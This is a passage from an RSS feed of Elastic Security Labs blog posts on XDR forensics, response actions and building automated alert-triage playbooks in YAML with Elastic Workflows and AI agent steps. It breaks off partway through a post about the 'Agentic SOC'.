<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/kr/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/kr/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility goes further through ongoing collaboration with the Osquery community. Supplemental tables for common investigative artifacts help uncover evidence such as browser history, AMCache records, and jumplist artifacts, making it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Elastic also provides a library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
<p>These capabilities turn artifact collection into an embedded step of the investigation rather than a separate workflow, so teams can confirm what happened and act sooner, all in one platform.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
<div class="youtube-video-container">
  <iframe width="560" height="315" src="https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv" title="Isolating a CrowdStrike-managed host directly from Elastic Security" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps</li>
</ul>
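<p>The steps above can be sketched as a single declarative playbook. The following minimal definition is illustrative only - the connector ID, index pattern, and field choices are assumptions, not values from a shipped template:</p>
<pre><code class="language-yaml">name: Host Triage Sketch
enabled: true

triggers:
  - type: alert

steps:
  - name: related_activity
    type: elasticsearch.esql.query
    with:
      query: |
        FROM logs-*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | STATS event_count = COUNT(*)
      format: json

  - name: open_case
    type: kibana.createCase
    with:
      title: &quot;Triage: {{ event.alerts[0].host.name }}&quot;
      description: &quot;Automated triage for {{ event.rule.name }}&quot;
      owner: securitySolution
      severity: medium

  - name: notify
    type: slack
    connector-id: &quot;soc-notifications&quot;  # assumed connector name
    with:
      message: &quot;Case {{ steps.open_case.output.id }} opened for {{ event.alerts[0].host.name }}&quot;
</code></pre>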
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle - capture a memory dump, collect a suspicious file (get-file), and list running processes - so responders have what they need immediately.</p>
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/kr/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. The team tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections - why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools - they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn more</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/kr/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML. Connector credentials, such as VirusTotal API keys or Slack tokens, are configured once under <strong>Stack Management &gt; Connectors</strong>:</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
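<p>Standard Liquid filters work inside the braces as well. A couple of illustrative patterns, assuming the usual LiquidJS built-ins such as <code>default</code> and <code>size</code> are available (the field choices here are examples, not required parameters):</p>
<pre><code class="language-yaml">    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 | default: 'unknown' }}&quot;
      note: &quot;{{ event.alerts | size }} alert(s) in this execution&quot;
</code></pre>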
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
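<p>For instance, a hash-prevalence check follows the same shape. This is a sketch; the <code>logs-*</code> index pattern is an assumption, so point it at wherever your endpoint data actually lives:</p>
<pre><code class="language-yaml">  - name: hash_prevalence
    type: elasticsearch.esql.query
    with:
      query: |
        FROM logs-*
        | WHERE file.hash.sha256 == &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
        | STATS occurrences = COUNT(*), hosts_seen = COUNT_DISTINCT(host.name)
      format: json
</code></pre>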
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/kr/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
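<p>Wired into the branch, the classification replaces the numeric threshold. A sketch, assuming string comparison works in conditions the same way the numeric comparison did earlier:</p>
<pre><code class="language-yaml">  - name: route_on_classification
    type: if
    condition: steps.classify_alert.output.category != &quot;false_positive&quot;
    steps:
      # true positive path: enrich, create a case, notify
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>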
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
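<p>A case-creation step can then reference the summary instead of templating raw fields. This sketch reuses the <code>kibana.createCase</code> shape from earlier; the title format is illustrative:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;{{ steps.classify_alert.output.category }} on {{ event.alerts[0].host.name }}&quot;
          description: |
            {{ steps.initial_summary.output.content }}
          owner: securitySolution
          severity: high
          tags:
            - automation
</code></pre>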
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
        VirusTotal: {{ steps.check_virustotal.output | json }}
        Related alerts: {{ steps.related_alerts.output | json }}
    timeout: 10m
</code></pre>
<p>The agent processes the input, calls whatever tools it needs, and returns its findings. The workflow waits, then continues with the next steps: adding the investigation to the case, notifying the team, and updating the case description with a concise summary of what the agent found.</p>
<p>Setting <code>create-conversation: true</code> persists the conversation, so the workflow can fetch the agent's reasoning trail and add it to the case as a structured comment with clickable links to each query it ran. And the analyst gets a direct link to pick up the conversation with the agent if they want to dig deeper.</p>
<h3>Putting it together</h3>
<p>In the full version of this workflow, the three AI steps work in sequence:</p>
<ol>
<li><strong>Classify</strong> the alert to drive the triage decision</li>
<li><strong>Summarize</strong> the alert for the initial case description and Slack notification</li>
<li><strong>Agent</strong> investigates the full scope: persistence, lateral movement, IOCs, affected systems</li>
<li><strong>Summarize</strong> again, this time distilling the agent's findings into a concise, updated case description</li>
</ol>
<p>The case starts with a clean factual overview and evolves into a comprehensive summary as the investigation completes. The agent's full analysis and reasoning trail live as case comments for analysts who want the details.</p>
<p>The complete workflow, including the AI investigation pipeline with reasoning trails, clickable Discover links, and follow-up Slack notifications, is available in the <a href="https://github.com/elastic/workflows">Elastic Workflows library on GitHub</a>.</p>
<h2>Workflows as agent tools</h2>
<p>The integration between Workflows and Agent Builder works in both directions. Workflows can call agents (as shown above). And agents can call workflows.</p>
<p>When you expose a workflow as a tool in Agent Builder, an agent can invoke it during a conversation. The agent decides what needs to happen, and the workflow handles the execution reliably and repeatably.</p>
<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and invoking Agent Builder agents and skills</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/kr/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing real-time alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
